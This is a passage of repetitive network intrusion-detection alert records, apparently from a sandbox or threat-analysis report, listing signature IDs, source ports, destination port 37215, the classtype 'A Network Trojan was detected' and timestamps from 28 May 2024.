          SID:2829579
          Source Port:54786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177081
          SID:2829579
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535510
          SID:2829579
          Source Port:35628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599051
          SID:2829579
          Source Port:53888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271196
          SID:2829579
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464107
          SID:2835222
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662769
          SID:2835222
          Source Port:43554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949305
          SID:2835222
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977381
          SID:2835222
          Source Port:40180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978121
          SID:2829579
          Source Port:33702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156793
          SID:2829579
          Source Port:36584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814093
          SID:2829579
          Source Port:56574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240243
          SID:2829579
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961757
          SID:2829579
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213353
          SID:2835222
          Source Port:38068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2835222
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210818
          SID:2835222
          Source Port:45020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116902
          SID:2829579
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157560
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244816
          SID:2829579
          Source Port:52350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267067
          SID:2835222
          Source Port:46744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846415
          SID:2829579
          Source Port:54486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656646
          SID:2829579
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613920
          SID:2835222
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724618
          SID:2835222
          Source Port:39066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232644
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840293
          SID:2835222
          Source Port:60442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215965
          SID:2835222
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547976
          SID:2829579
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631490
          SID:2829579
          Source Port:35382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.628609
          SID:2829579
          Source Port:38876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044748
          SID:2829579
          Source Port:47424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593284
          SID:2829579
          Source Port:53970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667394
          SID:2829579
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866799
          SID:2829579
          Source Port:54034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241994
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146121
          SID:2829579
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298176
          SID:2835222
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426552
          SID:2835222
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685597
          SID:2835222
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742376
          SID:2835222
          Source Port:48524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760496
          SID:2829579
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325972
          SID:2835222
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103298
          SID:2829579
          Source Port:46336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953814
          SID:2835222
          Source Port:49162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841235
          SID:2835222
          Source Port:50358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399202
          SID:2829579
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.711024
          SID:2835222
          Source Port:36648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939485
          SID:2835222
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629336
          SID:2835222
          Source Port:40492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142579
          SID:2829579
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177207
          SID:2829579
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845145
          SID:2829579
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161646
          SID:2835222
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399209
          SID:2829579
          Source Port:54566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236896
          SID:2835222
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.679990
          SID:2835222
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048630
          SID:2835222
          Source Port:39642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150879
          SID:2835222
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543612
          SID:2829579
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115468
          SID:2835222
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634168
          SID:2829579
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170876
          SID:2835222
          Source Port:41442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662902
          SID:2835222
          Source Port:50106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266483
          SID:2835222
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953944
          SID:2829579
          Source Port:52456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176821
          SID:2835222
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345860
          SID:2835222
          Source Port:54804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224888
          SID:2829579
          Source Port:59196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266595
          SID:2835222
          Source Port:38786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326725
          SID:2829579
          Source Port:60956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953928
          SID:2829579
          Source Port:35124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412726
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845291
          SID:2835222
          Source Port:50832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198258
          SID:2829579
          Source Port:40546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922776
          SID:2835222
          Source Port:43616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266185
          SID:2829579
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298516
          SID:2835222
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946630
          SID:2835222
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151313
          SID:2835222
          Source Port:38258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280795
          SID:2835222
          Source Port:49100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551652
          SID:2829579
          Source Port:51780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480900
          SID:2835222
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940926
          SID:2829579
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270807
          SID:2835222
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652366
          SID:2835222
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.619377
          SID:2835222
          Source Port:49426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064806
          SID:2835222
          Source Port:39988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2829579
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267249
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176487
          SID:2829579
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923848
          SID:2829579
          Source Port:39186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095510
          SID:2829579
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537267
          SID:2835222
          Source Port:46832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046927
          SID:2835222
          Source Port:37524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131627
          SID:2835222
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663084
          SID:2835222
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176237
          SID:2829579
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075491
          SID:2829579
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743703
          SID:2829579
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960238
          SID:2835222
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270813
          SID:2829579
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195598
          SID:2829579
          Source Port:51754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466365
          SID:2835222
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102382
          SID:2835222
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549500
          SID:2835222
          Source Port:52254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202761
          SID:2829579
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603823
          SID:2835222
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269214
          SID:2829579
          Source Port:57780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328799
          SID:2829579
          Source Port:41518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325377
          SID:2835222
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626716
          SID:2829579
          Source Port:59974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978270
          SID:2829579
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405326
          SID:2835222
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338083
          SID:2835222
          Source Port:52008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269849
          SID:2835222
          Source Port:39962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664118
          SID:2835222
          Source Port:38466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269226
          SID:2829579
          Source Port:37780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336992
          SID:2829579
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2835222
          Source Port:51534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595305
          SID:2835222
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338660
          SID:2829579
          Source Port:60128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986183
          SID:2835222
          Source Port:41800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690404
          SID:2829579
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336097
          SID:2829579
          Source Port:44846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591711
          SID:2829579
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530273
          SID:2835222
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772046
          SID:2835222
          Source Port:45714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156163
          SID:2835222
          Source Port:44254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267920
          SID:2829579
          Source Port:32966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.679800
          SID:2835222
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484918
          SID:2829579
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857677
          SID:2829579
          Source Port:39648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045690
          SID:2835222
          Source Port:40542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325386
          SID:2829579
          Source Port:38544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755605
          SID:2829579
          Source Port:44486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.559646
          SID:2835222
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839648
          SID:2835222
          Source Port:49560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908971
          SID:2835222
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203067
          SID:2829579
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815704
          SID:2829579
          Source Port:35938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178030
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239163
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664518
          SID:2829579
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299283
          SID:2835222
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667843
          SID:2829579
          Source Port:53658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321108
          SID:2835222
          Source Port:51036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565163
          SID:2829579
          Source Port:54988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337008
          SID:2829579
          Source Port:41684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267938
          SID:2835222
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317249
          SID:2829579
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331588
          SID:2835222
          Source Port:33908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726985
          SID:2835222
          Source Port:43178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849994
          SID:2835222
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222182
          SID:2829579
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341730
          SID:2829579
          Source Port:42408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064436
          SID:2835222
          Source Port:60192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171848
          SID:2835222
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138214
          SID:2829579
          Source Port:40926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911600
          SID:2829579
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710642
          SID:2835222
          Source Port:39216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198030
          SID:2835222
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021426
          SID:2835222
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807458
          SID:2829579
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143686
          SID:2835222
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328719
          SID:2835222
          Source Port:38390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177550
          SID:2829579
          Source Port:39682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739953
          SID:2835222
          Source Port:34684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937846
          SID:2829579
          Source Port:47116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964997
          SID:2829579
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332651
          SID:2829579
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176894
          SID:2835222
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.417737
          SID:2829579
          Source Port:43898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205476
          SID:2829579
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196010
          SID:2829579
          Source Port:58172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848204
          SID:2835222
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986231
          SID:2829579
          Source Port:55676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336694
          SID:2829579
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327888
          SID:2835222
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116912
          SID:2835222
          Source Port:36514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466589
          SID:2829579
          Source Port:60790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710313
          SID:2835222
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305924
          SID:2829579
          Source Port:58932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815887
          SID:2835222
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600879
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115405
          SID:2829579
          Source Port:42284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116672
          SID:2829579
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816671
          SID:2829579
          Source Port:36302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141725
          SID:2829579
          Source Port:38922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195450
          SID:2835222
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562196
          SID:2835222
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183460
          SID:2835222
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221581
          SID:2835222
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337871
          SID:2829579
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542141
          SID:2829579
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292415
          SID:2835222
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298744
          SID:2835222
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208320
          SID:2829579
          Source Port:51604
          Destination Port:37215
